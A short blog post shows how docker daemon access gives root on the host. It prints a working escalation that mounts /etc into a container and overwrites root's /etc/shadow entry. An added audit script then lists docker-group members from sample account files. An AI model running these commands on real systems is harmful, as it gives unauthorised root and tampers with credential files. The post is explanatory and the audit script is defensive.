2016-09-20 - root via docker

there are a lot of discussions regarding docker and its security features. there are two main aspects here:

  1. can an application, started as non-root inside a container, escape from it?
  2. can we gain root access by having access to docker?

in this post i'd like to quickly answer the 2nd question. just try this one out:

docker run -it --rm -v /etc/:/mnt debian:stable
sed -i 's#^root:.*#root:YOUR_PROPERLY_ENCODED_PASSWORD_GOES_HERE:0:0:99999:7:::#' /mnt/shadow
exit
su # type in your new password

and voila – you're root now.

how does it work? it's simple – we're mapping the content of /etc/ from the root filesystem (docker's daemon can access it) as /mnt inside our (temporary) container. inside the container, with root privileges, we edit the shadow file to set our own password.

is it the only way to go? definitely NO! some more examples follow:

…and probably many more, alike. i think you get the point.

long story short – giving any user access to the docker daemon means effectively giving her root access.
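
to act on that conclusion you need to know who already has daemon access. the script below is an added example, not part of the original post: it lists every account in the group that owns the docker socket, including accounts that have it as their primary group and so never show up in the group file's member list. the group name "docker" (the default on linux installs), the file-based account databases and the function name docker_equivalent_users are assumptions.

```shell
#!/bin/sh
# added example: list accounts that are effectively root because they are
# in the group that owns the docker socket (assumed to be "docker").

# docker_equivalent_users GROUP_FILE PASSWD_FILE [GROUP_NAME]
# prints, sorted and one per line, every user who is in GROUP_NAME either
#   - as a supplementary member (group file, field 4), or
#   - via the primary gid (passwd file, field 4 equals the group's gid).
docker_equivalent_users() {
    group_file=$1
    passwd_file=$2
    group_name=${3:-docker}
    awk -F: -v g="$group_name" '
        FILENAME == ARGV[1] {             # group database
            if ($1 == g) {
                gid = $3
                n = split($4, members, ",")
                for (i = 1; i <= n; i++)
                    if (members[i] != "") seen[members[i]] = 1
            }
            next
        }
        gid != "" && $4 == gid { seen[$1] = 1 }   # passwd database
        END { for (u in seen) print u }
    ' "$group_file" "$passwd_file" | sort
}

# constructed sample databases (not taken from a real host)
sample_dir=$(mktemp -d)
cat > "$sample_dir/group" <<'EOF'
root:x:0:
sudo:x:27:alice
docker:x:998:bob,carol
EOF
cat > "$sample_dir/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
alice:x:1000:1000::/home/alice:/bin/bash
bob:x:1001:1001::/home/bob:/bin/bash
ci:x:1002:998::/home/ci:/usr/sbin/nologin
EOF

# bob and carol are listed members; ci has gid 998 as its primary group
docker_equivalent_users "$sample_dir/group" "$sample_dir/passwd"
```

on a real host pass /etc/group and /etc/passwd, and treat every name printed as an account with root.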